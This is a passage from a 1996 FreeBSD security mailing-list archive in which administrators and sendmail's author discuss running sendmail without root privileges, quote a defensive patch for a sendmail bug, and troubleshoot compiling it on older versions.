(cf. "nobody") rather than the root user. For the *extremely* small subset of tasks for which sendmail requires root privileges to accomplish, I'd prefer to modify sendmail so that it can accomplish them in a different way rather than just admit defeat and let sendmail have the privileges on a permanent basis. Letting it have root 24 hours per day is, In My Humble Experience, just asking for trouble. > What am I missing? Compartmentalization, I think. - mark [ tomorrow's lesson: Why does lpd run as root? ] --- Mark Newton Email: newton@communica.com.au Systems Engineer Phone: +61-8-8373-2523 Communica Systems WWW: http://www.communica.com.au From owner-freebsd-security Sun Nov 17 19:36:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA05573 for security-outgoing; Sun, 17 Nov 1996 19:36:07 -0800 (PST) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA05539 for ; Sun, 17 Nov 1996 19:35:50 -0800 (PST) Received: (from msmith@localhost) by genesis.atrad.adelaide.edu.au (8.8.2/8.7.3) id OAA17231; Mon, 18 Nov 1996 14:05:05 +1030 (CST) From: Michael Smith Message-Id: <199611180335.OAA17231@genesis.atrad.adelaide.edu.au> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: from Warner Losh at "Nov 17, 96 07:55:10 pm" To: imp@village.org (Warner Losh) Date: Mon, 18 Nov 1996 14:05:04 +1030 (CST) Cc: newton@communica.com.au, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Warner Losh stands accused of saying: > > I don't buy this. You need to be able to create a mailbox of an > arbitrary user, and then write to that mailbox with that user's uid, > or to a shell of that user's uid. To do otherwise would introduce > other security problems, some of which have been beat to death in the > freebsd lists. > > What am I missing? mail.local. Mark's sense of warmth is perhaps slightly over-smug, but his point is valid. In fact, if it were possible to be non-root and bind to port 25, then sendmail could be run non-root in daemon mode and not be called from cron (which Mark omitted to mention). > Warner -- ]] Mike Smith, Software Engineer msmith@gsoft.com.au [[ ]] Genesis Software genesis@gsoft.com.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control. (ph) +61-8-8267-3493 [[ ]] Unix hardware collector. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Sun Nov 17 19:40:11 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA05797 for security-outgoing; Sun, 17 Nov 1996 19:40:11 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id TAA05766 for ; Sun, 17 Nov 1996 19:40:04 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id WAA10831; Sun, 17 Nov 1996 22:35:08 -0500 From: Adam Shostack Message-Id: <199611180335.WAA10831@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <199611180335.OAA17231@genesis.atrad.adelaide.edu.au> from Michael Smith at "Nov 18, 96 02:05:04 pm" To: msmith@atrad.adelaide.edu.au (Michael Smith) Date: Sun, 17 Nov 1996 22:35:07 -0500 (EST) Cc: freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk smap/smapd (from the TIS firewall toolkit) can handle mail delivery services & binding to port 25. They're designed for security. Adam Michael Smith wrote: | Warner Losh stands accused of saying: | > I don't buy this. You need to be able to create a mailbox of an | > arbitrary user, and then write to that mailbox with that user's uid, | > or to a shell of that user's uid. To do otherwise would introduce | > other security problems, some of which have been beat to death in the | > freebsd lists. | > What am I missing? | mail.local. | | Mark's sense of warmth is perhaps slightly over-smug, but his point is | valid. In fact, if it were possible to be non-root and bind to port 25, | then sendmail could be run non-root in daemon mode and not be called from | cron (which Mark omitted to mention). -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Sun Nov 17 19:42:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA05912 for security-outgoing; Sun, 17 Nov 1996 19:42:06 -0800 (PST) Received: from knecht.Sendmail.ORG (root@knecht.oxford.reference.com [205.217.47.98]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA05892; Sun, 17 Nov 1996 19:41:50 -0800 (PST) Received: from knecht.Sendmail.ORG (eric@LOCALHOST [127.0.0.1]) by knecht.Sendmail.ORG (8.8.3/8.8.3) with ESMTP id TAA21895; Sun, 17 Nov 1996 19:42:59 -0800 (PST) Message-Id: <199611180342.TAA21895@knecht.Sendmail.ORG> X-Mailer: exmh version 1.6.7 5/3/96 To: igor@alecto.physics.uiuc.edu (Igor Roshchin) From: Eric Allman X-URL: http://WWW.InReference.COM/~eric cc: roberto@keltia.freenix.fr (Ollivier Robert), freebsd-security@freebsd.org, freebsd-hackers@freebsd.org Subject: Re: New sendmail bug... In-reply-to: Mail from igor@alecto.physics.uiuc.edu (Igor Roshchin) dated Sun, 17 Nov 1996 21:12:33 CST <199611180312.VAA27437@alecto.physics.uiuc.edu> Date: Sun, 17 Nov 1996 19:42:58 -0800 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This patch is against 8.8.2, not 8.7.6. You need to upgrade to 8.8; 8.7.x is no long supported. eric ============= In Reply To: =========================================== : From: igor@alecto.physics.uiuc.edu (Igor Roshchin) : Subject: Re: New sendmail bug... : Date: Sun, 17 Nov 1996 21:12:33 -0600 (CST) : Hello! : : May be I am missing something, : but I was not able to compile the patched version : of the sendmail 8.7.6.4, : as it appears in FreeBSD distribution (sup.freebsd.org). : : main.o: Undefined symbol `_vendor_daemon_setup' referenced from text segment : *** Error code 1 : : : Is it a problem due to the version of FreeBSD ? : I tried it on 2.1.5-stable and 2.1.5-release; - : results were the same. : : Thanks in advance for your suggestions. : : IgoR : : : > : > ------- main.c ------- : > *** - Wed Dec 31 16:00:00 1969 : > --- main.c Sat Nov 16 07:07:17 1996 : > *************** : > *** 493,507 **** : > { : > case MD_DAEMON: : > case MD_FGDAEMON: : > ! # ifdef DAEMON : > ! if (RealUid != 0) : > ! { : > ! usrerr("Permission denied"); : > ! exit(EX_USAGE); : > ! } : > ! vendor_daemon_setup(CurEnv); : > ! /* fall through ... */ : > ! # else : > usrerr("Daemon mode not implemented"); : > ExitStat = EX_USAGE; : > break; : > --- 493,499 ---- : > { : > case MD_DAEMON: : > case MD_FGDAEMON: : > ! # ifndef DAEMON : > usrerr("Daemon mode not implemented"); : > ExitStat = EX_USAGE; : > break; : > *************** : > *** 899,904 **** : > --- 891,904 ---- : > /* fall through ... */ : > : > case MD_DAEMON: : > + /* check for permissions */ : > + if (RealUid != 0) : > + { : > + usrerr("Permission denied"); : > + exit(EX_USAGE); : > + } : > + vendor_daemon_setup(CurEnv); : > + : > /* remove things that don't make sense in daemon mode */ : > FullName = NULL; : > GrabTo = FALSE; : > *************** : > *** 1932,1937 **** : > --- 1932,1946 ---- : > syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); : > #endif : > releasesignal(SIGHUP); : > + if (setuid(RealUid) < 0 || setgid(RealGid) < 0) : > + { : > + #ifdef LOG : > + if (LogLevel > 0) : > + syslog(LOG_ALERT, "could not set[ug]id(%d, %d): %m", : > + RealUid, RealGid); : > + #endif : > + exit(EX_OSERR); : > + } : > execv(SaveArgv[0], (ARGV_T) SaveArgv); : > #ifdef LOG : > if (LogLevel > 0) : > : > : From owner-freebsd-security Sun Nov 17 19:45:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA06161 for security-outgoing; Sun, 17 Nov 1996 19:45:45 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA06156 for ; Sun, 17 Nov 1996 19:45:37 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id TAA14598; Sun, 17 Nov 1996 19:44:30 -0800 (PST) From: Don Lewis Message-Id: <199611180344.TAA14598@salsa.gv.ssi1.com> Date: Sun, 17 Nov 1996 19:44:30 -0800 In-Reply-To: newton@communica.com.au (Mark Newton) "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 1:17pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: newton@communica.com.au (Mark Newton), batie@agora.rdrop.com (Alan Batie) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: imp@village.org, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 1:17pm, Mark Newton wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } sendmail really only needs root so that it can bind to the "privileged" } port 25 when it's running in daemon mode. Some flavors of sendmail close this socket when the load average gets to high to refuse incoming mail, then re-open it later. } If you frob filesystem permissions } sufficiently you can get away without providing sendmail with root } privileges by running it with a non-root uid out of inetd (which is, } indeed, precisely what I have done with it here at Communica, where } sendmail runs as the unprivileged "smtp" user). If your users run programs (like vacation) from their .forward files, sendmail runs these processes under their uids. If you're in an environment where no local delivery is done, then you can hack sendmail to setuid(harmless) right after it fork()s, which should eliminate a lot of the danger, though not the latest problem :-(. --- Truck From owner-freebsd-security Sun Nov 17 20:10:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA07639 for security-outgoing; Sun, 17 Nov 1996 20:10:07 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA07614 for ; Sun, 17 Nov 1996 20:09:52 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id UAA14636; Sun, 17 Nov 1996 20:09:02 -0800 (PST) From: Don Lewis Message-Id: <199611180409.UAA14636@salsa.gv.ssi1.com> Date: Sun, 17 Nov 1996 20:09:01 -0800 In-Reply-To: newton@communica.com.au (Mark Newton) "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 1:42pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: newton@communica.com.au (Mark Newton), imp@village.org (Warner Losh) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 1:42pm, Mark Newton wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } Garbage. You can create the mailbox at the same time that you create } the user (as part of the adduser script). Set the mailbox's gid to } "smtp" and run sendmail with the "smtp" gid Some MUAs delete empty mailboxes. I think they're broken, but ... } (actually, I don't do this } on our gateway machine at Communica: Nobody ever logs in to it, nobody } ever receives mail on it, sendmail is configured to forward "local" mail } to an internal host; special privileges to write local mailboxes aren't } needed, so sendmail doesn't get them given to it). I'm in the process of building a machine with a very similar configuration. It'll help me sleep a lot better. } > or to a shell of that user's uid. } } You allow shell escapes? I prefer an administrative model where the } system administrator gets to decide who can run programs on the local } host, rather than the users themselves. You don't let pleb users create } files in a system's cgi-bin directory, why should you let them run } commands out of their .forward files? Isn't sendmail a program used for } transferring mail, rather than a program used to allow any user on the } Internet to execute arbitrary commands on your system? You can limit the damage by configuring sendmail to use smrsh so that it can only run those programs that you believe are safe. --- Truck From owner-freebsd-security Sun Nov 17 20:19:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA07922 for security-outgoing; Sun, 17 Nov 1996 20:19:36 -0800 (PST) Received: from panda.hilink.com.au (panda.hilink.com.au [203.2.144.5]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA07907 for ; Sun, 17 Nov 1996 20:19:09 -0800 (PST) Received: (from danny@localhost) by panda.hilink.com.au (8.7.6/8.7.3) id PAA07530; Mon, 18 Nov 1996 15:18:19 +1100 (EST) Date: Mon, 18 Nov 1996 15:18:14 +1100 (EST) From: "Daniel O'Callaghan" To: Mark Newton cc: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <9611180247.AA15359@communica.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 18 Nov 1996, Mark Newton wrote: > Of course, one of the main reasons why sendmail is so "dangerous" is that > despite fifteen years of it-hurts-when-I-do-this style experience, we *still* > run it as root! Why do we do this? Why does nobody understand that a UNIX > process can't just gratuitously gain privileges unless some other privileged > program gives them away? Given sendmail's history, why do so many people > still trust it with root privileges when it doesn't actually need them?! > > sendmail really only needs root so that it can bind to the "privileged" > port 25 when it's running in daemon mode. If you frob filesystem permissions > sufficiently you can get away without providing sendmail with root > privileges by running it with a non-root uid out of inetd (which is, > indeed, precisely what I have done with it here at Communica, where > sendmail runs as the unprivileged "smtp" user). I've been thinking about this, too. Why *does* sendmail need to run as root? a) to bind to port 25 (fixable with inetd, and other ways) b) to operate on the mail queue (fixable with a group 'mail' or somesuch) c) to deliver local mail - nope, /usr/libexec/mail.local is suid root to do this. Are there any other reasons? Danny From owner-freebsd-security Sun Nov 17 20:20:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA08025 for security-outgoing; Sun, 17 Nov 1996 20:20:41 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA08015 for ; Sun, 17 Nov 1996 20:20:32 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id VAA21852; Sun, 17 Nov 1996 21:20:19 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id VAA00293; Sun, 17 Nov 1996 21:18:30 -0700 (MST) Date: Sun, 17 Nov 1996 21:18:29 -0700 (MST) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: =?KOI8-R?Q?=E1=CE=C4=D2=C5=CA_=FE=C5=D2=CE=CF=D7?= cc: freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <199611180225.FAA01413@nagual.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Incorrect. Sendmail still attempts a lookup for something, I think it is the local hostname, for each piece of mail it processes. Last I checked, this could NOT be disabled without recompiling sendmail. Modifying your config file or adding a service.switch file does not stop it. Normally this isn't a problem without DNS since the query will fail right away and sendmail will go on its happy way, but it is a big problem when you have a machine with some type of dial on demand networking setup that gets mail via uucp. Followups should go somewhere more appropriate, perhaps hackers if it is remotely technical or chat if not. =20 On Mon, 18 Nov 1996, [KOI8-R] =E1=CE=C4=D2=C5=CA =FE=C5=D2=CE=CF=D7 wrote: > > Sendmail's support of UUCP isn't wonderful (mostly a problem of > > getting DNS totally disabled). How well does qmail support UUCP? >=20 > It is possible to totally disable DNS via >=20 > /etc/service.switch: > # To disable DNS search for sendmail > hosts files >=20 >=20 > --=20 > Andrey A. Chernov > > http://www.nagual.ru/~ache/ >=20 From owner-freebsd-security Sun Nov 17 20:37:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA08729 for security-outgoing; Sun, 17 Nov 1996 20:37:40 -0800 (PST) Received: from offensive.communica.com.au (offensive-eth1.adl.communica.com.au [192.82.222.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA08686 for ; Sun, 17 Nov 1996 20:37:06 -0800 (PST) Received: from communica.com.au (frenzy.communica.com.au [192.82.222.65]) by offensive.communica.com.au (8.7.6/8.7.3) with SMTP id PAA14708; Mon, 18 Nov 1996 15:06:07 +1030 (CST) Received: by communica.com.au (4.1/SMI-4.1) id AA17191; Mon, 18 Nov 96 15:05:39 CDT From: newton@communica.com.au (Mark Newton) Message-Id: <9611180435.AA17191@communica.com.au> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: msmith@atrad.adelaide.edu.au (Michael Smith) Date: Mon, 18 Nov 1996 15:05:38 +1030 (CST) Cc: imp@village.org, newton@communica.com.au, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.ORG In-Reply-To: <199611180335.OAA17231@genesis.atrad.adelaide.edu.au> from "Michael Smith" at Nov 18, 96 02:05:04 pm X-Mailer: ELM [version 2.4 PL21] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 8bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Michael Smith wrote: > Mark's sense of warmth is perhaps slightly over-smug, Have you ever known me to be any different? :-) > but his point is > valid. In fact, if it were possible to be non-root and bind to port 25, That's a wonderful point: The only reason sendmail needs root to bind to port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP ports less than 1024 can only be allocated by a privileged user. TCP/IP implementations on non-UNIX platforms disagree violently with this assumption, which makes the value of this "security" feature rather dubious. It would be foolish of me to argue to have it changed, though :-) > then sendmail could be run non-root in daemon mode and not be called from > cron (which Mark omitted to mention). That would have allowed a user to obtain a setuid shell owned by the "smtp" user by exploiting the latest bug. While not as serious as a root shell, I'm still not wonderfully happy about the possibility. - mark --- Mark Newton Email: newton@communica.com.au Systems Engineer Phone: +61-8-8373-2523 Communica Systems WWW: http://www.communica.com.au From owner-freebsd-security Sun Nov 17 20:41:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA08906 for security-outgoing; Sun, 17 Nov 1996 20:41:39 -0800 (PST) Received: from super-g.inch.com (spork@super-g.com [204.178.32.161]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA08872; Sun, 17 Nov 1996 20:41:14 -0800 (PST) Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id WAA15352; Sun, 17 Nov 1996 22:39:11 -0500 Date: Sun, 17 Nov 1996 21:39:11 -0600 (CST) From: "S(pork)" X-Sender: spork@super-g.inch.com To: Eric Allman cc: Igor Roshchin , Ollivier Robert , freebsd-security@freebsd.org, freebsd-hackers@freebsd.org Subject: Re: New sendmail bug... In-Reply-To: <199611180342.TAA21895@knecht.Sendmail.ORG> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk But if one does have to run 8.7.6 until they have time to breath, does anyone know if the error that Igor and I are seeing compiling 8.7.6 from -stable can be avoided? I first patched with the 2 line setgid, setuid patch I saw on the list, then I grabbed what was in the current -stable source and got the same error as Igor. It compiled after deleting the line in main.c that I saw in the errors, and it seems to work, but reckless deletion scares me. I wonder what the line was for.... Anyhow, any help is appreciated. Thanks, Charles On Sun, 17 Nov 1996, Eric Allman wrote: > This patch is against 8.8.2, not 8.7.6. You need to upgrade to 8.8; > 8.7.x is no long supported. > > eric > > > ============= In Reply To: =========================================== > : From: igor@alecto.physics.uiuc.edu (Igor Roshchin) > : Subject: Re: New sendmail bug... > : Date: Sun, 17 Nov 1996 21:12:33 -0600 (CST) > > : Hello! > : > : May be I am missing something, > : but I was not able to compile the patched version > : of the sendmail 8.7.6.4, > : as it appears in FreeBSD distribution (sup.freebsd.org). > : > : main.o: Undefined symbol `_vendor_daemon_setup' referenced from text segment > : *** Error code 1 > : > : > : Is it a problem due to the version of FreeBSD ? > : I tried it on 2.1.5-stable and 2.1.5-release; - > : results were the same. > : > : Thanks in advance for your suggestions. > : > : IgoR > : > : > : > > : > ------- main.c ------- > : > *** - Wed Dec 31 16:00:00 1969 > : > --- main.c Sat Nov 16 07:07:17 1996 > : > *************** > : > *** 493,507 **** > : > { > : > case MD_DAEMON: > : > case MD_FGDAEMON: > : > ! # ifdef DAEMON > : > ! if (RealUid != 0) > : > ! { > : > ! usrerr("Permission denied"); > : > ! exit(EX_USAGE); > : > ! } > : > ! vendor_daemon_setup(CurEnv); > : > ! /* fall through ... */ > : > ! # else > : > usrerr("Daemon mode not implemented"); > : > ExitStat = EX_USAGE; > : > break; > : > --- 493,499 ---- > : > { > : > case MD_DAEMON: > : > case MD_FGDAEMON: > : > ! # ifndef DAEMON > : > usrerr("Daemon mode not implemented"); > : > ExitStat = EX_USAGE; > : > break; > : > *************** > : > *** 899,904 **** > : > --- 891,904 ---- > : > /* fall through ... */ > : > > : > case MD_DAEMON: > : > + /* check for permissions */ > : > + if (RealUid != 0) > : > + { > : > + usrerr("Permission denied"); > : > + exit(EX_USAGE); > : > + } > : > + vendor_daemon_setup(CurEnv); > : > + > : > /* remove things that don't make sense in daemon mode */ > : > FullName = NULL; > : > GrabTo = FALSE; > : > *************** > : > *** 1932,1937 **** > : > --- 1932,1946 ---- > : > syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); > : > #endif > : > releasesignal(SIGHUP); > : > + if (setuid(RealUid) < 0 || setgid(RealGid) < 0) > : > + { > : > + #ifdef LOG > : > + if (LogLevel > 0) > : > + syslog(LOG_ALERT, "could not set[ug]id(%d, %d): %m", > : > + RealUid, RealGid); > : > + #endif > : > + exit(EX_OSERR); > : > + } > : > execv(SaveArgv[0], (ARGV_T) SaveArgv); > : > #ifdef LOG > : > if (LogLevel > 0) > : > > : > > : > > > From owner-freebsd-security Sun Nov 17 20:46:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA09281 for security-outgoing; Sun, 17 Nov 1996 20:46:37 -0800 (PST) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA09261 for ; Sun, 17 Nov 1996 20:46:27 -0800 (PST) Received: (from msmith@localhost) by genesis.atrad.adelaide.edu.au (8.8.2/8.7.3) id PAA17729; Mon, 18 Nov 1996 15:16:22 +1030 (CST) From: Michael Smith Message-Id: <199611180446.PAA17729@genesis.atrad.adelaide.edu.au> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <9611180435.AA17191@communica.com.au> from Mark Newton at "Nov 18, 96 03:05:38 pm" To: newton@communica.com.au (Mark Newton) Date: Mon, 18 Nov 1996 15:16:21 +1030 (CST) Cc: security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Mark Newton stands accused of saying: > Michael Smith wrote: > > > Mark's sense of warmth is perhaps slightly over-smug, > > Have you ever known me to be any different? :-) Ah well, I guess not. (I guess my Pringle lease has expired too. *sigh*) > It would be foolish of me to argue to have it changed, though :-) But no more foolish that many of your other crusades 8) > That would have allowed a user to obtain a setuid shell owned by the > "smtp" user by exploiting the latest bug. While not as serious as a > root shell, I'm still not wonderfully happy about the possibility. Perhaps. Still, I argue along similar lines to you; no users on mail machines, no mail on user machines. In fact, I think that shell accounts have very little use in most environments. (Teaching and development are about the only two left IMHO.) > Mark Newton Email: newton@communica.com.au -- ]] Mike Smith, Software Engineer msmith@gsoft.com.au [[ ]] Genesis Software genesis@gsoft.com.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control. (ph) +61-8-8267-3493 [[ ]] Unix hardware collector. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Sun Nov 17 20:46:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA09304 for security-outgoing; Sun, 17 Nov 1996 20:46:45 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id UAA09283 for ; Sun, 17 Nov 1996 20:46:37 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPLaR-0003jx-00; Sun, 17 Nov 1996 21:45:35 -0700 To: newton@communica.com.au (Mark Newton) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org In-reply-to: Your message of "Mon, 18 Nov 1996 13:42:43 +1030." <9611180312.AA15775@communica.com.au> References: <9611180312.AA15775@communica.com.au> Date: Sun, 17 Nov 1996 21:45:35 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <9611180312.AA15775@communica.com.au> Mark Newton writes: : Garbage. You can create the mailbox at the same time that you create : the user (as part of the adduser script). Set the mailbox's gid to : "smtp" and run sendmail with the "smtp" gid (actually, I don't do this : on our gateway machine at Communica: Nobody ever logs in to it, nobody : ever receives mail on it, sendmail is configured to forward "local" mail : to an internal host; special privileges to write local mailboxes aren't : needed, so sendmail doesn't get them given to it). And if that file is ever removed? Then you are SOL. : Removing shell escapes from .forward is, IMHO, of a similar league to : disabling the functionality of .rhosts files. Shell escapes are, and always : have been, a feature which permits unaccountable abuses of security to : provide "ease of use" which only a small subset of users really care about. I'm sorry, but that is not an acceptible answer in a general purpose OS. What you do on your system is OK, but that is *NOT* a good reason to remove sendmail from the base OS. People expect the ability to run whatever they please, or at least a subset selected by the admin. In order to do that, the mail agent must run as that person. In order to do that, the mail agent must either run a setuid program that is accessible to the mail delivery agent (and likely others), or it must run as root. Your arguments are good for security in general, but they break too many things for the general OS case. I'm sorry, but saying "and if you disable these features, then your mail agent doesn't need to run as root" is not a valid argument. Finding a secure way to run your MTA to provide those features is a better excersize. : [ tomorrow's lesson: Why does lpd run as root? ] Most of the time it doesn't, at least on NetBSD and OpenBSD. :-) Warner From owner-freebsd-security Sun Nov 17 20:55:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA09776 for security-outgoing; Sun, 17 Nov 1996 20:55:03 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id UAA09764 for ; Sun, 17 Nov 1996 20:54:51 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPLig-0003lG-00; Sun, 17 Nov 1996 21:54:06 -0700 To: newton@communica.com.au (Mark Newton) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: msmith@atrad.adelaide.edu.au (Michael Smith), batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org In-reply-to: Your message of "Mon, 18 Nov 1996 15:05:38 +1030." <9611180435.AA17191@communica.com.au> References: <9611180435.AA17191@communica.com.au> Date: Sun, 17 Nov 1996 21:54:06 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <9611180435.AA17191@communica.com.au> Mark Newton writes: : That's a wonderful point: The only reason sendmail needs root to bind to : port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP : ports less than 1024 can only be allocated by a privileged user. TCP/IP : implementations on non-UNIX platforms disagree violently with this : assumption, which makes the value of this "security" feature rather dubious. : : It would be foolish of me to argue to have it changed, though :-) Sense sendmail closes port 25 when the load average is high, it would be a bad idea to allow just anybody to bind to port 25 in this case. Just a few forks, wait for the load avarage to get high, then grab the port.... :-) The binding to ports < 1024 on the local system being restricted to non-normal users is a good thing. Sadly, on Unix you can't do much better than having it being root, since most Unix systems aren't designed to have fine grain system privs. It is hard to design a foolproof mail system, because the fools out there are so engenious.... Warner From owner-freebsd-security Sun Nov 17 20:58:14 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA09976 for security-outgoing; Sun, 17 Nov 1996 20:58:14 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA09961 for ; Sun, 17 Nov 1996 20:57:59 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id UAA14688; Sun, 17 Nov 1996 20:57:45 -0800 (PST) From: Don Lewis Message-Id: <199611180457.UAA14688@salsa.gv.ssi1.com> Date: Sun, 17 Nov 1996 20:57:45 -0800 In-Reply-To: Adam Shostack "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 17, 10:35pm) X-Mailer: Mail User's Shell (7.2.6 